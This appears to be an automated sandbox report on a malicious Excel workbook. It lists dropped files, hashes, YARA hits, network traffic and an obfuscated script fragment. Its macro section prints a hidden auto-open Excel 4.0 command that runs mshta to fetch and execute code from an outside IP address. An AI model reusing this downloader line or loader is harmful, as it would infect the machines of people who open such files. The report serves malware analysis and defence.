                                  Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

                                  C:\Users\user\AppData\Local\Temp\4173.tmp

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.1464700112623651
                                  Encrypted:false
                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                  Malicious:false
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CabFBE6.tmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61414
                                  Entropy (8bit):7.995245868798237
                                  Encrypted:true
                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                  Malicious:false
                                  Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                  C:\Users\user\AppData\Local\Temp\~DF493D2E47BBB482A7.TMP

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.5189161831469296
                                  Encrypted:false
                                  SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                  MD5:06A30014EFAE12913C829BE85DD271EC
                                  SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                  SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                  SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\~DF958AA1C6F3D6D4C6.TMP

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1T8X5DZLZY7O85LP3LGQ.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8016
                                  Entropy (8bit):3.581071677225738
                                  Encrypted:false
                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                  Malicious:false
                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msex (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8016
                                  Entropy (8bit):3.581071677225738
                                  Encrypted:false
                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                  Malicious:false
                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                  C:\Users\user\Desktop\imedpub_6.xls

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                  Category:dropped
                                  Size (bytes):86528
                                  Entropy (8bit):7.100278057839206
                                  Encrypted:false
                                  SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3T:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxT
                                  MD5:DDDAE242BE9D69182C82ED3AD608CD22
                                  SHA1:6A892E72C3BB01203F2C6BF593A45B5BC300E073
                                  SHA-256:85F3C947695FA054D71EB4C5EFF5D4D2F164D6D3895A5F4C87428FB3AA1BC1F5
                                  SHA-512:90D3E159B367F14F12F144BB7F1F0E6F60EE84BE19A19E8F40545918714325609C44DC95C5203675182401327C6BA433EC8BD79BE43A6A89C6C0EE7C59DB845F
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: John Lambert @JohnLaTwC
                                  • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: Joe Security
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                  C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)

                                  Download File
                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):548864
                                  Entropy (8bit):6.980518796737633
                                  Encrypted:false
                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                  Entropy (8bit):7.096975054765422
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 78.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                  File name:imedpub_6.xls
                                  File size:86588
                                  MD5:eee4085b8c00a4dbae2459b0f97ebeb7
                                  SHA1:c449b3584ff6db4b37c402aa27ed8b6793b5bd74
                                  SHA256:b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
                                  SHA512:194cc0d0667bf67d71bb2653a523113191a123078451fed8ab74b1924d8b3fce4de18393483da839a876c1efff906100e20894142630837f4ccf980cbc09312e
                                  SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "imedpub_6.xls"

                                  Indicators
                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True
                                  Summary
                                  Code Page:1251
                                  Author:xXx
                                  Last Saved By:xXx
                                  Create Time:2022-01-27 23:41:00
                                  Last Saved Time:2022-01-28 06:31:03
                                  Creating Application:Microsoft Excel
                                  Security:0
                                  Document Summary
                                  Document Code Page:1251
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams

                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.324918127833
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.263079431268
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:76002
                                  Entropy:7.62172227998
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                  Macro 4.0 Code

                                  Name:REEEEEEEE
                                  Type:3
                                  Final:False
                                  Visible:False
                                  Protected:False
                                                    REEEEEEEE
                  3
                  False
                  0
                  False
                  post
                  2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
                                  Name:REEEEEEEE
                                  Type:3
                                  Final:False
                                  Visible:False
                                  Protected:False
                                                    REEEEEEEE
                  3
                  False
                  0
                  False
                  pre
                  2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  01/28/22-21:01:38.683580TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.172

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 28, 2022 21:01:33.819127083 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.880640030 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.880728960 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.881614923 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.942898989 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943207026 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943257093 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943295956 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943316936 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943336964 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943346977 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943350077 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943380117 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943386078 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943420887 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943444967 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943460941 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943463087 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943504095 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.943505049 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943540096 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943568945 CET804916791.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:33.943671942 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:33.972279072 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:38.618396044 CET4916880192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:38.679992914 CET804916891.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:38.680088997 CET4916880192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:38.683579922 CET4916880192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:38.745055914 CET804916891.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:38.745675087 CET804916891.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:38.745712042 CET804916891.240.118.172192.168.2.22
                                  Jan 28, 2022 21:01:38.745856047 CET4916880192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:38.842412949 CET4916980192.168.2.22164.90.147.135
                                  Jan 28, 2022 21:01:41.856457949 CET4916980192.168.2.22164.90.147.135
                                  Jan 28, 2022 21:01:44.086548090 CET4916780192.168.2.2291.240.118.172
                                  Jan 28, 2022 21:01:47.863270044 CET4916980192.168.2.22164.90.147.135
                                  Jan 28, 2022 21:02:00.002283096 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.181339979 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.181447983 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.181602955 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.360706091 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370345116 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370373011 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370387077 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370400906 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370413065 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370424986 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370441914 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370454073 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370465040 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370480061 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.370712042 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.549765110 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549796104 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549807072 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549823999 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549839973 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549882889 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549899101 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549911022 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549923897 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549941063 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549957037 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.549984932 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550002098 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550019026 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550035000 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550040960 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.550051928 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550067902 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550076962 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.550082922 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.550085068 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550096989 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550110102 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.550131083 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.550170898 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.729242086 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729274035 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729293108 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729310036 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729326010 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729342937 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729356050 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729368925 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729383945 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729401112 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729406118 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.729417086 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729433060 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729449987 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729455948 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.729469061 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729485035 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729490042 CET4917080192.168.2.22103.206.244.105
                                  Jan 28, 2022 21:02:00.729501963 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729517937 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729536057 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729551077 CET8049170103.206.244.105192.168.2.22
                                  Jan 28, 2022 21:02:00.729552031 CET4917080192.168.2.22103.206.244.105

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 28, 2022 21:01:38.788352966 CET5216753192.168.2.228.8.8.8
                                  Jan 28, 2022 21:01:38.832066059 CET53521678.8.8.8192.168.2.22
                                  Jan 28, 2022 21:01:59.982759953 CET5059153192.168.2.228.8.8.8
                                  Jan 28, 2022 21:02:00.001409054 CET53505918.8.8.8192.168.2.22

